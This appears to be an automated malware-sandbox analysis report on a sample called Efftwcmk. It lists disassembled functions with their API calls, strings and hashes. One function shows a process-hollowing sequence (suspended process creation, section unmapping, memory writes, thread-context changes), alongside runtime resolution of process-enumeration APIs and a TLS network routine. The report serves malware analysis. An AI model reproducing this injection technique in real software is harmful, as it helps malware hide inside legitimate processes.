Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: b88e2bc91ed39e20b69f5f7bc01802cdb811aa9d2339642323e80e57a249cb10
Instruction ID: 989b2b1347401367d449e8d081c9fdc89b382c61ddfa606602e45fd73ad52995
Opcode Fuzzy Hash: b88e2bc91ed39e20b69f5f7bc01802cdb811aa9d2339642323e80e57a249cb10
Instruction Fuzzy Hash: EA411E75B501089BEB24FBA4D841A9EB7FAEF88314F218432E051A7290DB74AD06AF55

Function 02C8C6D2 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02C74ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C74EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 5910ed9d1b8cd2dfbf4bfa6d433b5cedcfa36d8d4026bce9e77653a2c3b61de0
Instruction ID: a0066262064d600bafb3a6f90ef15d142dc38bd3fcfb71069fb602a3e8037e32
Opcode Fuzzy Hash: 5910ed9d1b8cd2dfbf4bfa6d433b5cedcfa36d8d4026bce9e77653a2c3b61de0
Instruction Fuzzy Hash: BF21C071A40308BAEB24EAE4CC42FAEB7BDEB04B04F604472B600F71C0D7B46F049A65

Function 02C8C6D4 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02C74ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C74EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 18dd52e3cb2ec1b99b24ba98522245f632c1ccb0f6d0674bf0e8fefcdecaa981
Instruction ID: e7081264859b6f39222a9305c41a990d34040754fe98f0028d7629750fa3a3c4
Opcode Fuzzy Hash: 18dd52e3cb2ec1b99b24ba98522245f632c1ccb0f6d0674bf0e8fefcdecaa981
Instruction Fuzzy Hash: AF21CD71A40308BAEB24EAE4CC42F9EB7BDEB04B04F604472B600F71C0D7B46B049A65

Function 2D2661F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMON

Download Yara Rule

Strings

Pk)-N)-, xrefs: 2D2661F2

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID:
String ID: Pk)-N)-
API String ID: 0-771429351
Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction ID: f99085d0a5bcfd01eb75ae565d7926c18a1c21d2c871593eff75e1d92953b079
Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction Fuzzy Hash: E3026D71E4021A9BDF14CFA9CC806ADB7F1FF88315F2582A9D919F7385D731AA418B90

Function 02C77F4C Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C77F6D

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 143f9268a5e80dfaa54f38b765d793ec00e29daf0b12b5486355743ae4680b83
Instruction ID: 585790d53f304870806eb8e447fe354259cd9efd62611c9eadcc093e3278fd49
Opcode Fuzzy Hash: 143f9268a5e80dfaa54f38b765d793ec00e29daf0b12b5486355743ae4680b83
Instruction Fuzzy Hash: 691116B5E00209AF9B04CF99C980DEFF7F9EFC8304B14C559A509EB254D6319A01CBA0

Function 02C86D40 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02C86CE4: CLSIDFromProgID.OLE32(00000000), ref: 02C86D11

CoCreateInstance.OLE32(?,00000000,00000005,02C86E24,00000000), ref: 02C86D8F

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 1359a8cf082caa1c927c381a975360f45f3e91d876403bd46293ad05b77c709f
Instruction ID: 5be909808b2c791b30fd248b3dc9a17906ed3c56f507e88ea7362841a8f7e487
Opcode Fuzzy Hash: 1359a8cf082caa1c927c381a975360f45f3e91d876403bd46293ad05b77c709f
Instruction Fuzzy Hash: 9C012B71208744AFF715EF65DC5296F7BBDE749B14B718436F901D2640E6308D10D960

Function 02C7B704 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02C99106,00000000,02C9911E), ref: 02C7B712

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c86065df92ea5deaef3a9cd9801da3fae004d1dea9c342e3d5e6e6a57debb425
Instruction ID: f5c0093f235dcd150c90000acb63863d11b0e4bd6251b6ed083a505c5db06424
Opcode Fuzzy Hash: c86065df92ea5deaef3a9cd9801da3fae004d1dea9c342e3d5e6e6a57debb425
Instruction Fuzzy Hash: 94F034B4904702EFC350DF28D55AB1977F4FB88B04F418A28E898C7380E73A8825CF22

Function 02C89EB0 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89EC4
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89EDC
GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89EEE
GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89F00
GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89F12
GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9), ref: 02C89F24
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137), ref: 02C89F36
GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 02C89F48
GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 02C89F5A
GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 02C89F6C
GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 02C89F7E
GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 02C89F90
GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 02C89FA2
GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 02C89FB4
GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 02C89FC6
GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 02C89FD8
GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 02C89FEA

Strings

Module32Next, xrefs: 02C89FBE
Process32FirstW, xrefs: 02C89F64
CreateToolhelp32Snapshot, xrefs: 02C89ED4
Heap32ListFirst, xrefs: 02C89EE6
Heap32ListNext, xrefs: 02C89EF8
Heap32Next, xrefs: 02C89F1C
Module32NextW, xrefs: 02C89FE2
Toolhelp32ReadProcessMemory, xrefs: 02C89F2E
Module32FirstW, xrefs: 02C89FD0
Module32First, xrefs: 02C89FAC
Process32First, xrefs: 02C89F40
Process32Next, xrefs: 02C89F52
Heap32First, xrefs: 02C89F0A
Thread32Next, xrefs: 02C89F9A
Process32NextW, xrefs: 02C89F76
Thread32First, xrefs: 02C89F88
kernel32.dll, xrefs: 02C89EBF

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: e9ed0eb20c00e9439ec0cbc1e5b9f83da6a2bd7909dc3fc6cd79940bedd97960
Instruction ID: 234139123e3211d573c47cf42381c4c3cff96fa62270c92887143a86b7a51549
Opcode Fuzzy Hash: e9ed0eb20c00e9439ec0cbc1e5b9f83da6a2bd7909dc3fc6cd79940bedd97960
Instruction Fuzzy Hash: 573182B0940720DFFB10BFB4D885F2637ADEB097087504A7AE512CF604D77699509F95

Function 2D2380EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 2D238136
GetProcAddress.KERNEL32(00000000), ref: 2D238139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 2D23814A
GetProcAddress.KERNEL32(00000000), ref: 2D23814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 2D23815E
GetProcAddress.KERNEL32(00000000), ref: 2D238161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 2D238172
GetProcAddress.KERNEL32(00000000), ref: 2D238175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 2D238217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 2D23822F
GetThreadContext.KERNEL32(?,00000000), ref: 2D238245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 2D23826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 2D2382ED
TerminateProcess.KERNEL32(?,00000000), ref: 2D238301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 2D238341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 2D23840B
SetThreadContext.KERNEL32(?,00000000), ref: 2D238428
ResumeThread.KERNEL32(?), ref: 2D238435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 2D23844C
GetCurrentProcess.KERNEL32(?), ref: 2D238457
TerminateProcess.KERNEL32(?,00000000), ref: 2D238472
GetLastError.KERNEL32 ref: 2D23847A

Strings

ZwUnmapViewOfSection, xrefs: 2D23814F
ZwCreateSection, xrefs: 2D23811C
ZwClose, xrefs: 2D238163
ZwMapViewOfSection, xrefs: 2D23813B
ntdll, xrefs: 2D238121, 2D238140, 2D238154, 2D238168

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 93c20bdd9b708dd8224fe96ce53486a05cf83090c819dd3c6e38ecf4b8d624cd
Instruction ID: c91296e66eb8c49641b6bf9225c8827b8739e8556576feef879266bc7e3d97c8
Opcode Fuzzy Hash: 93c20bdd9b708dd8224fe96ce53486a05cf83090c819dd3c6e38ecf4b8d624cd
Instruction Fuzzy Hash: A9A16CB0645301AFEB508F64CC89B6BBBF8FF48B08F104829F645E6291E775E904CB65

Function 02C7D20C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C7D215

Part of subcall function 02C7D1E0: GetProcAddress.KERNEL32(00000000), ref: 02C7D1F9

Strings

VarDiv, xrefs: 02C7D2A7
VarMul, xrefs: 02C7D291
VarNot, xrefs: 02C7D24F
VarOr, xrefs: 02C7D2FF
VarI4FromStr, xrefs: 02C7D341
VarBoolFromStr, xrefs: 02C7D3AF
VarCmp, xrefs: 02C7D32B
oleaut32.dll, xrefs: 02C7D210
VarCyFromStr, xrefs: 02C7D399
VarBstrFromDate, xrefs: 02C7D3DB
VarAnd, xrefs: 02C7D2E9
VarDateFromStr, xrefs: 02C7D383
VarAdd, xrefs: 02C7D265
VarNeg, xrefs: 02C7D239
VarSub, xrefs: 02C7D27B
VariantChangeTypeEx, xrefs: 02C7D223
VarR4FromStr, xrefs: 02C7D357
VarR8FromStr, xrefs: 02C7D36D
VarIdiv, xrefs: 02C7D2BD
VarBstrFromCy, xrefs: 02C7D3C5
VarMod, xrefs: 02C7D2D3
VarXor, xrefs: 02C7D315
VarBstrFromBool, xrefs: 02C7D3F1

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 1f1fe35d63c26b066e26eefb84499d8b4846c7f8138fbd509a739d54a445b634
Instruction ID: e54f0da0645a298e28a9b894a34d5b5786310ba54090526bc116657d6f73f91c
Opcode Fuzzy Hash: 1f1fe35d63c26b066e26eefb84499d8b4846c7f8138fbd509a739d54a445b634
Instruction Fuzzy Hash: 5741B3E1A442064B1608AB6DB8014273BEEDF88765B60422FF006DBB00DF31BE419B7D

Function 2D221A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 2D221AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 2D221B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 2D221B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 2D221B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 2D221B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 2D221B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 2D221B54
WriteFile.KERNEL32(00000000,2D292AAA,00000002,00000000,00000000), ref: 2D221B65
WriteFile.KERNEL32(00000000,2D292AAC,00000004,00000000,00000000), ref: 2D221B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 2D221B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 2D221B96
WriteFile.KERNEL32(00000000,2D292AB6,00000002,00000000,00000000), ref: 2D221BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 2D221BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 2D221BC7

Strings

data, xrefs: 2D221BB1
WAVE, xrefs: 2D221B1D
fmt , xrefs: 2D221B2D
RIFF, xrefs: 2D221AFD

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: dca53b1aafbfb89d3d7f0b912d3c03b7a0fd4f1ffd74d9058c88b7796c3b9e0c
Instruction ID: e697680904826a646dad1d2ce3ba037e8831757c15e4a9987207db4f1e5050cf
Opcode Fuzzy Hash: dca53b1aafbfb89d3d7f0b912d3c03b7a0fd4f1ffd74d9058c88b7796c3b9e0c
Instruction Fuzzy Hash: 98417A725442087EE210CA51CC89FBBBFECEB89B54F40441AFA44E6181E765E909DBB3

Function 02C86E50 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02C86E56
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E67
GetProcAddress.KERNEL32(00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E77
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E87
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E97
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects,00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86EA7
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects,00000000,CoResumeClassObjects,00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86EB7

Strings

CoInitializeEx, xrefs: 02C86E71
CoReleaseServerProcess, xrefs: 02C86E91
CoResumeClassObjects, xrefs: 02C86EA1
CoAddRefServerProcess, xrefs: 02C86E81
CoSuspendClassObjects, xrefs: 02C86EB1
ole32.dll, xrefs: 02C86E51
CoCreateInstanceEx, xrefs: 02C86E61

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 9de4b6bc9186a22c456e0245e3b6ddf7f0f4a41cf1a7c900de4f6607464b56ed
Instruction ID: 20f9019e755892ab9db5d47304ba65016d3f7a155e752cffbbd826d318c39dce
Opcode Fuzzy Hash: 9de4b6bc9186a22c456e0245e3b6ddf7f0f4a41cf1a7c900de4f6607464b56ed
Instruction Fuzzy Hash: F0F059B1AD4B51AFB3007F719E85B273F9E9B0470C3B09935741256902DFB9C9146F50

Function 2D2248C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(FFFFFFFF,?,?), ref: 2D2248E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 2D224A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 2D224A0E
WSAGetLastError.WS2_32 ref: 2D224A21

Part of subcall function 2D23B4EF: GetLocalTime.KERNEL32(00000000), ref: 2D23B509

Strings

TLS Error 3, xrefs: 2D2249D8
TLS Handshake... | , xrefs: 2D224904
TLS Authentication Failed, xrefs: 2D224999
Connection Failed: , xrefs: 2D224A43
TLS Error 2, xrefs: 2D224955
Connection Refused, xrefs: 2D224A76
Pk)-N)-, xrefs: 2D2248C8
TLS Error 1, xrefs: 2D224937

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$Pk)-N)-$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-355407551
Opcode ID: 963b14f94ac446eae4a725530a40bff74c57428dc365279eb61595603b936d17
Instruction ID: 2fd2714b5316b4949afe71ca7a89a7e96e111b2b17a950e9d727dd0d265f7908
Opcode Fuzzy Hash: 963b14f94ac446eae4a725530a40bff74c57428dc365279eb61595603b936d17
Instruction Fuzzy Hash: E3419F64AC49026BD7247B79CC6D93D7A5AEF32140F404138FA0177A92EF12B911C7E3

Function 2D2712C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 2D27130A

Part of subcall function 2D270502: _free.LIBCMT ref: 2D27051F
Part of subcall function 2D270502: _free.LIBCMT ref: 2D270531
Part of subcall function 2D270502: _free.LIBCMT ref: 2D270543
Part of subcall function 2D270502: _free.LIBCMT ref: 2D270555
Part of subcall function 2D270502: _free.LIBCMT ref: 2D270567
Part of subcall function 2D270502: _free.LIBCMT ref: 2D270579
Part of subcall function 2D270502: _free.LIBCMT ref: 2D27058B
Part of subcall function 2D270502: _free.LIBCMT ref: 2D27059D
Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705AF
Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705C1
Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705D3
Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705E5
Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705F7

_free.LIBCMT ref: 2D2712FF

Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA

_free.LIBCMT ref: 2D271321
_free.LIBCMT ref: 2D271336
_free.LIBCMT ref: 2D271341
_free.LIBCMT ref: 2D271363
_free.LIBCMT ref: 2D271376
_free.LIBCMT ref: 2D271384
_free.LIBCMT ref: 2D27138F
_free.LIBCMT ref: 2D2713C7
_free.LIBCMT ref: 2D2713CE
_free.LIBCMT ref: 2D2713EB
_free.LIBCMT ref: 2D271403

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: dc5e764399070667ce7ef7ac2b595af4993422f196026a6e5c7093bdb6808819
Instruction ID: 9f61ae34f5b566c8ffe4facf61902c72d5fc85238f1cec74bc035cb244203680
Opcode Fuzzy Hash: dc5e764399070667ce7ef7ac2b595af4993422f196026a6e5c7093bdb6808819
Instruction Fuzzy Hash: E9315E31684B129FEB229A39DC40B6A73F8EF00352F519579E568F6554DB30BE808BA0

Function 02C72530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 02C728CE

Strings

Unexpected Memory Leak, xrefs: 02C728C0
7, xrefs: 02C726A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C72849
Unknown, xrefs: 02C7278C
bytes: , xrefs: 02C7275D
The unexpected small block leaks are:, xrefs: 02C72707
An unexpected memory leak has occurred. , xrefs: 02C72690
String, xrefs: 02C727A1
, xrefs: 02C72814

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
